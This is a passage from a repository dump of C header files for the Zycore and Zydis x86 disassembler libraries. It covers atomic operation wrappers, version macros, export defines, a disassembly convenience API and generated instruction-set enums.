10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | #ifndef ZYCORE_ATOMIC_MSVC_H
28 | #define ZYCORE_ATOMIC_MSVC_H
29 |
30 | #ifdef __cplusplus
31 | extern "C" {
32 | #endif
33 |
34 | #include
35 |
36 | #include
37 | #include
38 |
39 | /* ============================================================================================== */
40 | /* Functions */
41 | /* ============================================================================================== */
42 |
43 | #if defined(ZYAN_MSVC)
44 |
45 | /* ---------------------------------------------------------------------------------------------- */
46 | /* Pointer sized */
47 | /* ---------------------------------------------------------------------------------------------- */
48 |
49 | #if defined(ZYAN_X86)
50 |
51 | static ZYAN_INLINE ZyanUPointer ZyanAtomicCompareExchange(ZyanAtomicPointer* destination,
52 | ZyanUPointer comparand, ZyanUPointer value)
53 | {
54 | return (ZyanUPointer)ZyanAtomicCompareExchange32((ZyanAtomic32*)destination, comparand, value);
55 | }
56 |
57 | static ZYAN_INLINE ZyanUPointer ZyanAtomicIncrement(ZyanAtomicPointer* destination)
58 | {
59 | return (ZyanUPointer)ZyanAtomicIncrement32((ZyanAtomic32*)destination);
60 | }
61 |
62 | static ZYAN_INLINE ZyanUPointer ZyanAtomicDecrement(ZyanAtomicPointer* destination)
63 | {
64 | return (ZyanUPointer)ZyanAtomicDecrement32((ZyanAtomic32*)destination);
65 | }
66 |
67 | #elif defined(ZYAN_X64)
68 |
69 | static ZYAN_INLINE ZyanUPointer ZyanAtomicCompareExchange(ZyanAtomicPointer* destination,
70 | ZyanUPointer comparand, ZyanUPointer value)
71 | {
72 | return (ZyanUPointer)ZyanAtomicCompareExchange64((ZyanAtomic64*)destination, comparand, value);
73 | }
74 |
75 | static ZYAN_INLINE ZyanUPointer ZyanAtomicIncrement(ZyanAtomicPointer* destination)
76 | {
77 | return (ZyanUPointer)ZyanAtomicIncrement64((ZyanAtomic64*)destination);
78 | }
79 |
80 | static ZYAN_INLINE ZyanUPointer ZyanAtomicDecrement(ZyanAtomicPointer* destination)
81 | {
82 | return (ZyanUPointer)ZyanAtomicDecrement64((ZyanAtomic64*)destination);
83 | }
84 |
85 | #else
86 | # error "Unsupported architecture detected"
87 | #endif
88 |
89 | /* ---------------------------------------------------------------------------------------------- */
90 | /* 32-bit */
91 | /* ---------------------------------------------------------------------------------------------- */
92 |
93 | static ZYAN_INLINE ZyanU32 ZyanAtomicCompareExchange32(ZyanAtomic32* destination,
94 | ZyanU32 comparand, ZyanU32 value)
95 | {
96 | return (ZyanU32)(_InterlockedCompareExchange((volatile LONG*)&(destination->value),
97 | (LONG)value, (LONG)comparand));
98 | }
99 |
100 | static ZYAN_INLINE ZyanU32 ZyanAtomicIncrement32(ZyanAtomic32* destination)
101 | {
102 | return (ZyanU32)(_InterlockedIncrement((volatile LONG*)&(destination->value)));
103 | }
104 |
105 | static ZYAN_INLINE ZyanU32 ZyanAtomicDecrement32(ZyanAtomic32* destination)
106 | {
107 | return (ZyanU32)(_InterlockedDecrement((volatile LONG*)&(destination->value)));
108 | }
109 |
110 | /* ---------------------------------------------------------------------------------------------- */
111 | /* 64-bit */
112 | /* ---------------------------------------------------------------------------------------------- */
113 |
114 | static ZYAN_INLINE ZyanU64 ZyanAtomicCompareExchange64(ZyanAtomic64* destination,
115 | ZyanU64 comparand, ZyanU64 value)
116 | {
117 | return (ZyanU64)(_InterlockedCompareExchange64((volatile LONG64*)&(destination->value),
118 | (LONG64)value, (LONG64)comparand));
119 | }
120 |
121 | static ZYAN_INLINE ZyanU64 ZyanAtomicIncrement64(ZyanAtomic64* destination)
122 | {
123 | return (ZyanU64)(_InterlockedIncrement64((volatile LONG64*)&(destination->value)));
124 | }
125 |
126 | static ZYAN_INLINE ZyanU64 ZyanAtomicDecrement64(ZyanAtomic64* destination)
127 | {
128 | return (ZyanU64)(_InterlockedDecrement64((volatile LONG64*)&(destination->value)));
129 | }
130 |
131 | /* ---------------------------------------------------------------------------------------------- */
132 |
133 | #endif
134 |
135 | /* ============================================================================================== */
136 |
137 | #ifdef __cplusplus
138 | }
139 | #endif
140 |
141 | #endif /* ZYCORE_ATOMIC_MSVC_H */
142 |
--------------------------------------------------------------------------------
/inc/Zycore/Object.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Core Library (Zycore-C)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * Defines some generic object-related datatypes.
30 | */
31 |
32 | #ifndef ZYCORE_OBJECT_H
33 | #define ZYCORE_OBJECT_H
34 |
35 | #include
36 | #include
37 |
38 | #ifdef __cplusplus
39 | extern "C" {
40 | #endif
41 |
42 | /* ============================================================================================== */
43 | /* Enums and types */
44 | /* ============================================================================================== */
45 |
46 | /**
47 | * Defines the `ZyanMemberProcedure` function prototype.
48 | *
49 | * @param object A pointer to the object.
50 | */
51 | typedef void (*ZyanMemberProcedure)(void* object);
52 |
53 | /**
54 | * Defines the `ZyanConstMemberProcedure` function prototype.
55 | *
56 | * @param object A pointer to the object.
57 | */
58 | typedef void (*ZyanConstMemberProcedure)(const void* object);
59 |
60 | /**
61 | * Defines the `ZyanMemberFunction` function prototype.
62 | *
63 | * @param object A pointer to the object.
64 | *
65 | * @return A zyan status code.
66 | */
67 | typedef ZyanStatus (*ZyanMemberFunction)(void* object);
68 |
69 | /**
70 | * Defines the `ZyanConstMemberFunction` function prototype.
71 | *
72 | * @param object A pointer to the object.
73 | *
74 | * @return A zyan status code.
75 | */
76 | typedef ZyanStatus (*ZyanConstMemberFunction)(const void* object);
77 |
78 | /* ============================================================================================== */
79 |
80 | #ifdef __cplusplus
81 | }
82 | #endif
83 |
84 | #endif /* ZYCORE_OBJECT_H */
85 |
--------------------------------------------------------------------------------
/inc/Zycore/Zycore.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Core Library (Zycore-C)
4 |
5 | Original Author : Florian Bernd
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * Master include file, including everything else.
30 | */
31 |
32 | #ifndef ZYCORE_H
33 | #define ZYCORE_H
34 |
35 | #include
36 |
37 | // TODO:
38 |
39 | #ifdef __cplusplus
40 | extern "C" {
41 | #endif
42 |
43 | /* ============================================================================================== */
44 | /* Macros */
45 | /* ============================================================================================== */
46 |
47 | /* ---------------------------------------------------------------------------------------------- */
48 | /* Constants */
49 | /* ---------------------------------------------------------------------------------------------- */
50 |
51 | /**
52 | * A macro that defines the zycore version.
53 | */
54 | #define ZYCORE_VERSION (ZyanU64)0x0001000500000000
55 |
56 | /* ---------------------------------------------------------------------------------------------- */
57 | /* Helper macros */
58 | /* ---------------------------------------------------------------------------------------------- */
59 |
60 | /**
61 | * Extracts the major-part of the zycore version.
62 | *
63 | * @param version The zycore version value
64 | */
65 | #define ZYCORE_VERSION_MAJOR(version) (ZyanU16)((version & 0xFFFF000000000000) >> 48)
66 |
67 | /**
68 | * Extracts the minor-part of the zycore version.
69 | *
70 | * @param version The zycore version value
71 | */
72 | #define ZYCORE_VERSION_MINOR(version) (ZyanU16)((version & 0x0000FFFF00000000) >> 32)
73 |
74 | /**
75 | * Extracts the patch-part of the zycore version.
76 | *
77 | * @param version The zycore version value
78 | */
79 | #define ZYCORE_VERSION_PATCH(version) (ZyanU16)((version & 0x00000000FFFF0000) >> 16)
80 |
81 | /**
82 | * Extracts the build-part of the zycore version.
83 | *
84 | * @param version The zycore version value
85 | */
86 | #define ZYCORE_VERSION_BUILD(version) (ZyanU16)(version & 0x000000000000FFFF)
87 |
88 | /* ---------------------------------------------------------------------------------------------- */
89 |
90 | /* ============================================================================================== */
91 | /* Exported functions */
92 | /* ============================================================================================== */
93 |
94 | /**
95 | * Returns the zycore version.
96 | *
97 | * @return The zycore version.
98 | *
99 | * Use the macros provided in this file to extract the major, minor, patch and build part from the
100 | * returned version value.
101 | */
102 | ZYCORE_EXPORT ZyanU64 ZycoreGetVersion(void);
103 |
104 | /* ============================================================================================== */
105 |
106 | #ifdef __cplusplus
107 | }
108 | #endif
109 |
110 | #endif /* ZYCORE_H */
111 |
--------------------------------------------------------------------------------
/inc/Zydis/Defines.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Disassembler Library (Zydis)
4 |
5 | Original Author : Joel Hoener
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * Import/export defines for MSVC builds.
30 | */
31 |
32 | #ifndef ZYDIS_DEFINES_H
33 | #define ZYDIS_DEFINES_H
34 |
35 | #include
36 |
37 | // This is a cut-down version of what CMake's `GenerateExportHeader` would usually generate. To
38 | // simplify builds without CMake, we define these things manually instead of relying on CMake
39 | // to generate the header.
40 | //
41 | // For static builds, our CMakeList will define `ZYDIS_STATIC_BUILD`. For shared library builds,
42 | // our CMake will define `ZYDIS_SHOULD_EXPORT` depending on whether the target is being imported or
43 | // exported. If CMake isn't used, users can manually define these to fit their use-case.
44 |
45 | // Backward compatibility: CMake would previously generate these variables names. However, because
46 | // they have pretty cryptic names, we renamed them when we got rid of `GenerateExportHeader`. For
47 | // backward compatibility for users that don't use CMake and previously manually defined these, we
48 | // translate the old defines here and print a warning.
49 | #if defined(ZYDIS_STATIC_DEFINE)
50 | # pragma message("ZYDIS_STATIC_DEFINE was renamed to ZYDIS_STATIC_BUILD.")
51 | # define ZYDIS_STATIC_BUILD
52 | #endif
53 | #if defined(Zydis_EXPORTS)
54 | # pragma message("Zydis_EXPORTS was renamed to ZYDIS_SHOULD_EXPORT.")
55 | # define ZYDIS_SHOULD_EXPORT
56 | #endif
57 |
58 | /**
59 | * Symbol is exported in shared library builds.
60 | */
61 | #if defined(ZYDIS_STATIC_BUILD)
62 | # define ZYDIS_EXPORT
63 | #else
64 | # if defined(ZYDIS_SHOULD_EXPORT)
65 | # define ZYDIS_EXPORT ZYAN_DLLEXPORT
66 | # else
67 | # define ZYDIS_EXPORT ZYAN_DLLIMPORT
68 | # endif
69 | #endif
70 |
71 | /**
72 | * Symbol is not exported and for internal use only.
73 | */
74 | #define ZYDIS_NO_EXPORT
75 |
76 | #endif // ZYDIS_DEFINES_H
77 |
--------------------------------------------------------------------------------
/inc/Zydis/Disassembler.h:
--------------------------------------------------------------------------------
1 | /***************************************************************************************************
2 |
3 | Zyan Disassembler Library (Zydis)
4 |
5 | Original Author : Joel Hoener
6 |
7 | * Permission is hereby granted, free of charge, to any person obtaining a copy
8 | * of this software and associated documentation files (the "Software"), to deal
9 | * in the Software without restriction, including without limitation the rights
10 | * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | * copies of the Software, and to permit persons to whom the Software is
12 | * furnished to do so, subject to the following conditions:
13 | *
14 | * The above copyright notice and this permission notice shall be included in all
15 | * copies or substantial portions of the Software.
16 | *
17 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | * SOFTWARE.
24 |
25 | ***************************************************************************************************/
26 |
27 | /**
28 | * @file
29 | * All-in-one convenience function providing the simplest possible way to use Zydis.
30 | */
31 |
32 | #ifndef ZYDIS_DISASSEMBLER_H
33 | #define ZYDIS_DISASSEMBLER_H
34 |
35 | #include
36 | #include
37 |
38 | #ifdef __cplusplus
39 | extern "C" {
40 | #endif
41 |
42 | /* ============================================================================================== */
43 | /* Types */
44 | /* ============================================================================================== */
45 |
46 | /**
47 | * All commonly used information about a decoded instruction that Zydis can provide.
48 | *
49 | * This structure is filled in by calling `ZydisDisassembleIntel` or `ZydisDisassembleATT`.
50 | */
51 | typedef struct ZydisDisassembledInstruction_
52 | {
53 | /**
54 | * The runtime address that was passed when disassembling the instruction.
55 | */
56 | ZyanU64 runtime_address;
57 | /**
58 | * General information about the decoded instruction in machine-readable format.
59 | */
60 | ZydisDecodedInstruction info;
61 | /**
62 | * The operands of the decoded instruction in a machine-readable format.
63 | *
64 | * The amount of actual operands can be determined by inspecting the corresponding fields
65 | * in the `info` member of this struct. Inspect `operand_count_visible` if you care about
66 | * visible operands (those that are printed by the formatter) or `operand_count` if you're
67 | * also interested in implicit operands (for example the registers implicitly accessed by
68 | * `pushad`). Unused entries are zeroed.
69 | */
70 | ZydisDecodedOperand operands[ZYDIS_MAX_OPERAND_COUNT];
71 | /**
72 | * The textual, human-readable representation of the instruction.
73 | *
74 | * Guaranteed to be zero-terminated.
75 | */
76 | char text[96];
77 | } ZydisDisassembledInstruction;
78 |
79 | /* ============================================================================================== */
80 | /* Exported functions */
81 | /* ============================================================================================== */
82 |
83 | /**
84 | * Disassemble an instruction and format it to human-readable text in a single step (Intel syntax).
85 | *
86 | * @param machine_mode The machine mode to assume when disassembling. When in doubt, pass
87 | * `ZYDIS_MACHINE_MODE_LONG_64` for what is typically referred to as
88 | * "64-bit mode" or `ZYDIS_MACHINE_MODE_LEGACY_32` for "32-bit mode".
89 | * @param runtime_address The program counter (`eip` / `rip`) to assume when formatting the
90 | * instruction. Many instructions behave differently depending on the
91 | * address they are located at.
92 | * @param buffer A pointer to the raw instruction bytes that you wish to decode.
93 | * @param length The length of the input buffer. Note that this can be bigger than the
94 | * actual size of the instruction -- you don't have to know the size up
95 | * front. This length is merely used to prevent Zydis from doing
96 | * out-of-bounds reads on your buffer.
97 | * @param instruction A pointer to receive the decoded instruction information. Can be
98 | * uninitialized and reused on later calls.
99 | *
100 | * This is a convenience function intended as a quick path for getting started with using Zydis.
101 | * It internally calls a range of other more advanced functions to obtain all commonly needed
102 | * information about the instruction. It is likely that you won't need most of this information in
103 | * practice, so it is advisable to instead call these more advanced functions directly if you're
104 | * concerned about performance.
105 | *
106 | * This function essentially combines the following more advanced functions into a single call:
107 | *
108 | * - `ZydisDecoderInit`
109 | * - `ZydisDecoderDecodeInstruction`
110 | * - `ZydisDecoderDecodeOperands`
111 | * - `ZydisFormatterInit`
112 | * - `ZydisFormatterFormatInstruction`
113 | *
114 | * @return A zyan status code.
115 | */
116 | ZYDIS_EXPORT ZyanStatus ZydisDisassembleIntel(ZydisMachineMode machine_mode,
117 | ZyanU64 runtime_address, const void* buffer, ZyanUSize length,
118 | ZydisDisassembledInstruction *instruction);
119 |
120 | /**
121 | * Disassemble an instruction and format it to human-readable text in a single step (AT&T syntax).
122 | *
123 | * @copydetails ZydisDisassembleIntel
124 | */
125 | ZYDIS_EXPORT ZyanStatus ZydisDisassembleATT(ZydisMachineMode machine_mode,
126 | ZyanU64 runtime_address, const void* buffer, ZyanUSize length,
127 | ZydisDisassembledInstruction *instruction);
128 |
129 | /* ============================================================================================== */
130 |
131 | #ifdef __cplusplus
132 | }
133 | #endif
134 |
135 | #endif /* ZYDIS_DISASSEMBLER_H */
136 |
--------------------------------------------------------------------------------
/inc/Zydis/Generated/EnumISAExt.h:
--------------------------------------------------------------------------------
1 | /**
2 | * Defines the `ZydisISAExt` enum.
3 | */
4 | typedef enum ZydisISAExt_
5 | {
6 | ZYDIS_ISA_EXT_INVALID,
7 | ZYDIS_ISA_EXT_ADOX_ADCX,
8 | ZYDIS_ISA_EXT_AES,
9 | ZYDIS_ISA_EXT_AMD3DNOW,
10 | ZYDIS_ISA_EXT_AMD3DNOW_PREFETCH,
11 | ZYDIS_ISA_EXT_AMD_INVLPGB,
12 | ZYDIS_ISA_EXT_AMX_BF16,
13 | ZYDIS_ISA_EXT_AMX_FP16,
14 | ZYDIS_ISA_EXT_AMX_INT8,
15 | ZYDIS_ISA_EXT_AMX_TILE,
16 | ZYDIS_ISA_EXT_AVX,
17 | ZYDIS_ISA_EXT_AVX2,
18 | ZYDIS_ISA_EXT_AVX2GATHER,
19 | ZYDIS_ISA_EXT_AVX512EVEX,
20 | ZYDIS_ISA_EXT_AVX512VEX,
21 | ZYDIS_ISA_EXT_AVXAES,
22 | ZYDIS_ISA_EXT_AVX_IFMA,
23 | ZYDIS_ISA_EXT_AVX_NE_CONVERT,
24 | ZYDIS_ISA_EXT_AVX_VNNI,
25 | ZYDIS_ISA_EXT_AVX_VNNI_INT16,
26 | ZYDIS_ISA_EXT_AVX_VNNI_INT8,
27 | ZYDIS_ISA_EXT_BASE,
28 | ZYDIS_ISA_EXT_BMI1,
29 | ZYDIS_ISA_EXT_BMI2,
30 | ZYDIS_ISA_EXT_CET,
31 | ZYDIS_ISA_EXT_CLDEMOTE,
32 | ZYDIS_ISA_EXT_CLFLUSHOPT,
33 | ZYDIS_ISA_EXT_CLFSH,
34 | ZYDIS_ISA_EXT_CLWB,
35 | ZYDIS_ISA_EXT_CLZERO,
36 | ZYDIS_ISA_EXT_ENQCMD,
37 | ZYDIS_ISA_EXT_F16C,
38 | ZYDIS_ISA_EXT_FMA,
39 | ZYDIS_ISA_EXT_FMA4,
40 | ZYDIS_ISA_EXT_GFNI,
41 | ZYDIS_ISA_EXT_HRESET,
42 | ZYDIS_ISA_EXT_ICACHE_PREFETCH,
43 | ZYDIS_ISA_EXT_INVPCID,
44 | ZYDIS_ISA_EXT_KEYLOCKER,
45 | ZYDIS_ISA_EXT_KEYLOCKER_WIDE,
46 | ZYDIS_ISA_EXT_KNC,
47 | ZYDIS_ISA_EXT_KNCE,
48 | ZYDIS_ISA_EXT_KNCV,
49 | ZYDIS_ISA_EXT_LONGMODE,
50 | ZYDIS_ISA_EXT_LZCNT,
51 | ZYDIS_ISA_EXT_MCOMMIT,
52 | ZYDIS_ISA_EXT_MMX,
53 | ZYDIS_ISA_EXT_MONITOR,
54 | ZYDIS_ISA_EXT_MONITORX,
55 | ZYDIS_ISA_EXT_MOVBE,
56 | ZYDIS_ISA_EXT_MOVDIR,
57 | ZYDIS_ISA_EXT_MPX,
58 | ZYDIS_ISA_EXT_MSRLIST,
59 | ZYDIS_ISA_EXT_PADLOCK,
60 | ZYDIS_ISA_EXT_PAUSE,
61 | ZYDIS_ISA_EXT_PBNDKB,
62 | ZYDIS_ISA_EXT_PCLMULQDQ,
63 | ZYDIS_ISA_EXT_PCOMMIT,
64 | ZYDIS_ISA_EXT_PCONFIG,
65 | ZYDIS_ISA_EXT_PKU,
66 | ZYDIS_ISA_EXT_PREFETCHWT1,
67 | ZYDIS_ISA_EXT_PT,
68 | ZYDIS_ISA_EXT_RAO_INT,
69 | ZYDIS_ISA_EXT_RDPID,
70 | ZYDIS_ISA_EXT_RDPRU,
71 | ZYDIS_ISA_EXT_RDRAND,
72 | ZYDIS_ISA_EXT_RDSEED,
73 | ZYDIS_ISA_EXT_RDTSCP,
74 | ZYDIS_ISA_EXT_RDWRFSGS,
75 | ZYDIS_ISA_EXT_RTM,
76 | ZYDIS_ISA_EXT_SERIALIZE,
77 | ZYDIS_ISA_EXT_SGX,
78 | ZYDIS_ISA_EXT_SGX_ENCLV,
79 | ZYDIS_ISA_EXT_SHA,
80 | ZYDIS_ISA_EXT_SHA512,
81 | ZYDIS_ISA_EXT_SM3,
82 | ZYDIS_ISA_EXT_SM4,
83 | ZYDIS_ISA_EXT_SMAP,
84 | ZYDIS_ISA_EXT_SMX,
85 | ZYDIS_ISA_EXT_SNP,
86 | ZYDIS_ISA_EXT_SSE,
87 | ZYDIS_ISA_EXT_SSE2,
88 | ZYDIS_ISA_EXT_SSE3,
89 | ZYDIS_ISA_EXT_SSE4,
90 | ZYDIS_ISA_EXT_SSE4A,
91 | ZYDIS_ISA_EXT_SSSE3,
92 | ZYDIS_ISA_EXT_SVM,
93 | ZYDIS_ISA_EXT_TBM,
94 | ZYDIS_ISA_EXT_TDX,
95 | ZYDIS_ISA_EXT_TSX_LDTRK,
96 | ZYDIS_ISA_EXT_UINTR,
97 | ZYDIS_ISA_EXT_VAES,
98 | ZYDIS_ISA_EXT_VMFUNC,
99 | ZYDIS_ISA_EXT_VPCLMULQDQ,
100 | ZYDIS_ISA_EXT_VTX,
101 | ZYDIS_ISA_EXT_WAITPKG,
102 | ZYDIS_ISA_EXT_WRMSRNS,
103 | ZYDIS_ISA_EXT_X87,
104 | ZYDIS_ISA_EXT_XOP,
105 | ZYDIS_ISA_EXT_XSAVE,
106 | ZYDIS_ISA_EXT_XSAVEC,
107 | ZYDIS_ISA_EXT_XSAVEOPT,
108 | ZYDIS_ISA_EXT_XSAVES,
109 |
110 | /**
111 | * Maximum value of this enum.
112 | */
113 | ZYDIS_ISA_EXT_MAX_VALUE = ZYDIS_ISA_EXT_XSAVES,
114 | /**
115 | * The minimum number of bits required to represent all values of this enum.
116 | */
117 | ZYDIS_ISA_EXT_REQUIRED_BITS = ZYAN_BITS_TO_REPRESENT(ZYDIS_ISA_EXT_MAX_VALUE)
118 | } ZydisISAExt;
119 |
--------------------------------------------------------------------------------
/inc/Zydis/Generated/EnumISASet.h:
--------------------------------------------------------------------------------
1 | /**
2 | * Defines the `ZydisISASet` enum.
3 | */
4 | typedef enum ZydisISASet_
5 | {
6 | ZYDIS_ISA_SET_INVALID,
7 | ZYDIS_ISA_SET_ADOX_ADCX,
8 | ZYDIS_ISA_SET_AES,
9 | ZYDIS_ISA_SET_AMD,
10 | ZYDIS_ISA_SET_AMD3DNOW,
11 | ZYDIS_ISA_SET_AMD_INVLPGB,
12 | ZYDIS_ISA_SET_AMX_BF16,
13 | ZYDIS_ISA_SET_AMX_FP16,
14 | ZYDIS_ISA_SET_AMX_INT8,
15 | ZYDIS_ISA_SET_AMX_TILE,
16 | ZYDIS_ISA_SET_AVX,
17 | ZYDIS_ISA_SET_AVX2,
18 | ZYDIS_ISA_SET_AVX2GATHER,
19 | ZYDIS_ISA_SET_AVX512BW_128,
20 | ZYDIS_ISA_SET_AVX512BW_128N,
21 | ZYDIS_ISA_SET_AVX512BW_256,
22 | ZYDIS_ISA_SET_AVX512BW_512,
23 | ZYDIS_ISA_SET_AVX512BW_KOP,
24 | ZYDIS_ISA_SET_AVX512CD_128,
25 | ZYDIS_ISA_SET_AVX512CD_256,
26 | ZYDIS_ISA_SET_AVX512CD_512,
27 | ZYDIS_ISA_SET_AVX512DQ_128,
28 | ZYDIS_ISA_SET_AVX512DQ_128N,
29 | ZYDIS_ISA_SET_AVX512DQ_256,
30 | ZYDIS_ISA_SET_AVX512DQ_512,
31 | ZYDIS_ISA_SET_AVX512DQ_KOP,
32 | ZYDIS_ISA_SET_AVX512DQ_SCALAR,
33 | ZYDIS_ISA_SET_AVX512ER_512,
34 | ZYDIS_ISA_SET_AVX512ER_SCALAR,
35 | ZYDIS_ISA_SET_AVX512F_128,
36 | ZYDIS_ISA_SET_AVX512F_128N,
37 | ZYDIS_ISA_SET_AVX512F_256,
38 | ZYDIS_ISA_SET_AVX512F_512,
39 | ZYDIS_ISA_SET_AVX512F_KOP,
40 | ZYDIS_ISA_SET_AVX512F_SCALAR,
41 | ZYDIS_ISA_SET_AVX512PF_512,
42 | ZYDIS_ISA_SET_AVX512_4FMAPS_512,
43 | ZYDIS_ISA_SET_AVX512_4FMAPS_SCALAR,
44 | ZYDIS_ISA_SET_AVX512_4VNNIW_512,
45 | ZYDIS_ISA_SET_AVX512_BF16_128,
46 | ZYDIS_ISA_SET_AVX512_BF16_256,
47 | ZYDIS_ISA_SET_AVX512_BF16_512,
48 | ZYDIS_ISA_SET_AVX512_BITALG_128,
49 | ZYDIS_ISA_SET_AVX512_BITALG_256,
50 | ZYDIS_ISA_SET_AVX512_BITALG_512,
51 | ZYDIS_ISA_SET_AVX512_FP16_128,
52 | ZYDIS_ISA_SET_AVX512_FP16_128N,
53 | ZYDIS_ISA_SET_AVX512_FP16_256,
54 | ZYDIS_ISA_SET_AVX512_FP16_512,
55 | ZYDIS_ISA_SET_AVX512_FP16_SCALAR,
56 | ZYDIS_ISA_SET_AVX512_GFNI_128,
57 | ZYDIS_ISA_SET_AVX512_GFNI_256,
58 | ZYDIS_ISA_SET_AVX512_GFNI_512,
59 | ZYDIS_ISA_SET_AVX512_IFMA_128,
60 | ZYDIS_ISA_SET_AVX512_IFMA_256,
61 | ZYDIS_ISA_SET_AVX512_IFMA_512,
62 | ZYDIS_ISA_SET_AVX512_VAES_128,
63 | ZYDIS_ISA_SET_AVX512_VAES_256,
64 | ZYDIS_ISA_SET_AVX512_VAES_512,
65 | ZYDIS_ISA_SET_AVX512_VBMI2_128,
66 | ZYDIS_ISA_SET_AVX512_VBMI2_256,
67 | ZYDIS_ISA_SET_AVX512_VBMI2_512,
68 | ZYDIS_ISA_SET_AVX512_VBMI_128,
69 | ZYDIS_ISA_SET_AVX512_VBMI_256,
70 | ZYDIS_ISA_SET_AVX512_VBMI_512,
71 | ZYDIS_ISA_SET_AVX512_VNNI_128,
72 | ZYDIS_ISA_SET_AVX512_VNNI_256,
73 | ZYDIS_ISA_SET_AVX512_VNNI_512,
74 | ZYDIS_ISA_SET_AVX512_VP2INTERSECT_128,
75 | ZYDIS_ISA_SET_AVX512_VP2INTERSECT_256,
76 | ZYDIS_ISA_SET_AVX512_VP2INTERSECT_512,
77 | ZYDIS_ISA_SET_AVX512_VPCLMULQDQ_128,
78 | ZYDIS_ISA_SET_AVX512_VPCLMULQDQ_256,
